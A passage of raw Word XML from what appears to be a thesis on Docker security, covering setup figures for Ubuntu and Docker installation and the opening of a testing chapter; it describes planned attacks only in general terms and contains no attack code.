        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Network topology with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="001319A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerable application.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="27763693" w14:textId="585C83A1" w:rsidR="003E3388" w:rsidRDefault="003E3388" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc87032933"/>
      <w:r>
        <w:t>IMPLEMENTATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="13514824" w14:textId="00871DE6" w:rsidR="00EA103B" w:rsidRDefault="00C94FFD" w:rsidP="003E3388">
      <w:r>
        <w:t xml:space="preserve">This section discusses the implementation process </w:t>
      </w:r>
      <w:r w:rsidR="00EB0128">
        <w:t xml:space="preserve">step by step </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of each attack </w:t>
      </w:r>
      <w:r w:rsidR="00EB0128">
        <w:t>used. The author used a single laptop with Ubuntu release 20.04 and Docker version 20.10.7 installed to execute the attacks on the designed Docker ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="003D1C2F">
        <w:t xml:space="preserve">, and they are the </w:t>
      </w:r>
      <w:r w:rsidR="00B2644B">
        <w:t>essential</w:t>
      </w:r>
      <w:r w:rsidR="003D1C2F">
        <w:t xml:space="preserve"> tools of this project.</w:t>
      </w:r>
      <w:r w:rsidR="00E4330F">
        <w:t xml:space="preserve"> Both the tools are installed with their latest version </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B2644B">
        <w:t xml:space="preserve">in order </w:t>
      </w:r>
      <w:r w:rsidR="00E4330F">
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E4330F">
        <w:t xml:space="preserve"> examine and provide a clear picture of the current Docker security challenges.</w:t>
      </w:r>
      <w:r w:rsidR="00EA103B">
        <w:t xml:space="preserve"> Although the experiment uses a single </w:t>
      </w:r>
      <w:r w:rsidR="00BF09F9">
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="00EA103B">
        <w:t>, it is also possible to replicate the same attacks with multiple machines</w:t>
      </w:r>
      <w:r w:rsidR="00271AB0">
        <w:t xml:space="preserve"> connected via a network</w:t>
      </w:r>
      <w:r w:rsidR="00EA103B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B854A9">
        <w:t xml:space="preserve"> First, the Ubuntu kernel version is verified, as shown in figure 14, and then</w:t>
      </w:r>
      <w:r w:rsidR="00BF09F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B854A9">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00BF09F9">
        <w:t xml:space="preserve">he implementation process starts with installing and verifying </w:t>
      </w:r>
      <w:r w:rsidR="009A791A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BF09F9">
        <w:t>Docker engine on the Ubuntu laptop</w:t>
      </w:r>
      <w:r w:rsidR="009A791A">
        <w:t>, using the command shown in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B854A9">
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00181332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AD60A" w14:textId="66C87414" w:rsidR="00181332" w:rsidRDefault="00181332" w:rsidP="00181332">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5463EF2D" wp14:editId="18DB6352">
            <wp:extent cx="3124200" cy="1092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24200" cy="1092200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A1981" w14:textId="12D51A3F" w:rsidR="00181332" w:rsidRPr="00181332" w:rsidRDefault="00181332" w:rsidP="00181332">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc86858605"/>
      <w:bookmarkStart w:id="107" w:name="_Toc86867495"/>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Checking Ubuntu version.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="3872DB52" w14:textId="45AC531C" w:rsidR="00181332" w:rsidRDefault="00181332" w:rsidP="00181332">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CD927BC" wp14:editId="4D418CEE">
            <wp:extent cx="4229100" cy="16827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29100" cy="1682750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD3674" w14:textId="35F3B977" w:rsidR="00181332" w:rsidRDefault="00181332" w:rsidP="00181332">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc86858606"/>
      <w:bookmarkStart w:id="109" w:name="_Toc86867496"/>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00181332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: installing Docker engine on the host machine.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="56818F50" w14:textId="54AE76EF" w:rsidR="00C36B0D" w:rsidRPr="00C36B0D" w:rsidRDefault="005317CB" w:rsidP="00C36B0D">
      <w:r>
        <w:t xml:space="preserve">The screenshot below verifies the Docker </w:t>
      </w:r>
      <w:r w:rsidR="0057237A">
        <w:t>version installed on the host machine.</w:t>
      </w:r>
      <w:r w:rsidR="00FD6E3E">
        <w:t xml:space="preserve"> The Docker engine installed is version 20.10.7 </w:t>
      </w:r>
      <w:r w:rsidR="00C53AB0">
        <w:t xml:space="preserve">and is the </w:t>
      </w:r>
      <w:r w:rsidR="0052127E">
        <w:t>latest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001AA31D" w14:textId="0A420BBB" w:rsidR="000E6D8C" w:rsidRDefault="000E6D8C" w:rsidP="000E6D8C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C504E8" wp14:editId="70CF54B2">
            <wp:extent cx="4368464" cy="2495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71448" cy="2497255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38793BB6" w14:textId="2398BFE1" w:rsidR="00236B4B" w:rsidRDefault="004B3E49" w:rsidP="005536FC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc86858607"/>
      <w:bookmarkStart w:id="111" w:name="_Toc86867497"/>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0052127E" w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005536FC" w:rsidRPr="005536FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>verification Docker engine.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="35396864" w14:textId="7C35BDE3" w:rsidR="00C36B0D" w:rsidRPr="00C36B0D" w:rsidRDefault="00361831" w:rsidP="00C36B0D">
      <w:r>
        <w:t xml:space="preserve">Further, this project uses a single </w:t>
      </w:r>
      <w:r w:rsidR="00695474">
        <w:t>laptop using Ubuntu OS</w:t>
      </w:r>
      <w:r w:rsidR="00D215CD">
        <w:t xml:space="preserve">. The specifications of the laptop used </w:t>
      </w:r>
      <w:r w:rsidR="000F2908">
        <w:t>is presented in figure 17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB893D0" w14:textId="1852BF5F" w:rsidR="00640DE2" w:rsidRDefault="000E57A0" w:rsidP="000E6D8C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE2A332" wp14:editId="425530E0">
            <wp:extent cx="4748859" cy="1797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750436" cy="1797647"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539109B" w14:textId="3280FD2F" w:rsidR="004B3E49" w:rsidRPr="00DD5169" w:rsidRDefault="00C36B0D" w:rsidP="00DD5169">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc86858608"/>
      <w:bookmarkStart w:id="113" w:name="_Toc86867498"/>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000F2908" w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD5169" w:rsidRPr="00DD5169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the laptop specifications</w:t>
      </w:r>
      <w:r w:rsidR="007D6972">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="7208BAF9" w14:textId="4D4DF336" w:rsidR="001621DA" w:rsidRDefault="001621DA" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc87032934"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="427833BC" w14:textId="782FC0FC" w:rsidR="00D84EA5" w:rsidRPr="00D84EA5" w:rsidRDefault="00D84EA5" w:rsidP="00D84EA5">
      <w:r>
        <w:t xml:space="preserve">This section presented the design and implementation process </w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t>for the aimed attacks. All the attacks will be conducted on a single Ubuntu laptop with OS version 20.04 and Docker version 20.10.7 installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A96E0E" w14:textId="6F7B82D5" w:rsidR="00150103" w:rsidRDefault="004B3E49" w:rsidP="007E32EC">
      <w:r>
        <w:t xml:space="preserve">Following </w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t>chapter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cover</w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the execution procedure</w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00093277">
        <w:t xml:space="preserve"> and methods applied to</w:t>
      </w:r>
      <w:r w:rsidR="000957B7">
        <w:t xml:space="preserve"> under</w:t>
      </w:r>
      <w:r w:rsidR="00093277">
        <w:t>take of each attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> step by step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70572787" w14:textId="5A945383" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="0754B0F8" w14:textId="5715CE8B" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="7AA18A07" w14:textId="22391F16" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="046A623E" w14:textId="00479070" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="547CB6BC" w14:textId="4F7B1DEB" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="41379D82" w14:textId="0DA2559A" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="27BAB277" w14:textId="405D3794" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="5329F305" w14:textId="0B5CE0E2" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="052BFE52" w14:textId="03C83675" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="32DDCF7E" w14:textId="026DD5F7" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="4AB61941" w14:textId="46F3B91E" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="0F1190F6" w14:textId="2FF2F7C6" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="17182892" w14:textId="14D92103" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="68D43DDD" w14:textId="315635F5" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="5360B658" w14:textId="40402C9A" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="78FBF997" w14:textId="77777777" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="007E32EC"/>
    <w:p w14:paraId="7C6A6BB6" w14:textId="20853E8B" w:rsidR="006536B6" w:rsidRDefault="006536B6" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc87032935"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-TESTING AND EXPERIMENT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="5D2A9F50" w14:textId="7595A89F" w:rsidR="006536B6" w:rsidRDefault="006536B6" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc87032936"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="66D78852" w14:textId="6332FBB7" w:rsidR="006536B6" w:rsidRPr="006536B6" w:rsidRDefault="006536B6" w:rsidP="006536B6">
      <w:r>
        <w:t xml:space="preserve">This chapter will provide the techniques and procedures used to undertake </w:t>
      </w:r>
      <w:r w:rsidR="003F1E36">
        <w:t>the attacks discussed in the previous chapter</w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
